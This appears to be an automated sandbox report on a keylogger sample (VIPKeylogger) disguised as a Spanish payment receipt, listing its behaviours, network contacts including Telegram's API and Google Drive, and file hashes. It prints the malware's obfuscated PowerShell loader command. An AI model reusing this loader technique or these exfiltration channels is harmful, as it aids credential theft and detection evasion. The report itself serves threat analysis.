Analysis Overview
SHA256
ebac7c8cd5045f76ed8f27f50eaa9c1734560bf4d9b398d81ab0ccd1c5af9e49
Threat Level: Known bad
The file JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Blocklisted process makes network request
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-11-29 08:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-11-29 08:37
Reported: 2024-11-29 08:40
Platform: win7-20241010-en
Max time kernel: 119s
Max time network: 120s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1692 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe
"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2024-11-29 08:37
Reported: 2024-11-29 08:40
Platform: win10v2004-20241007-en
Max time kernel: 143s
Max time network: 149s
Signatures
VIPKeylogger
Vipkeylogger family
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe
"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTEPAGOFRASNOVIEMBRE2024.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.180.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lla3erk5.zad.ps1
| Hash | Value |
|---|---|
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl
| Hash | Value |
|---|---|
| MD5 | daed86cf08d9bb9cd6ecb4738054b4bf |
| SHA1 | dccb735db3c40e005b405719a7e7fbffbabd4266 |
| SHA256 | b2b48b891fda2d469556c1b554de00c8d6259e04749961ed80376d1f1b2976f0 |
| SHA512 | f881ca1571ba0e4a770318865d176c1cb3ec1b842df11c12935617406c27abc308c24928ec3c0c1f3fb32c8947fd796e9c118ee04b3b279da36e3ecffd711c1c |
C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Canchas.Mou
| Hash | Value |
|---|---|
| MD5 | 5d3d1c39210847fc1d4ae76b2272a8f4 |
| SHA1 | 88b4f7bba955a4eabaffea4689806b8d409be5ee |
| SHA256 | 04588cf44f89229f0b94e58b3203909c53cfe076062c3bd1844268924c12d289 |
| SHA512 | 497df70f2bdb5c64ac5ab5d06486e1241cf58a76c9c4d501682e5c659d73ddd9bac15c8be45cc5e39021cdcf98592efa1c2aa02e4d1ccc42ae5911d29aecc085 |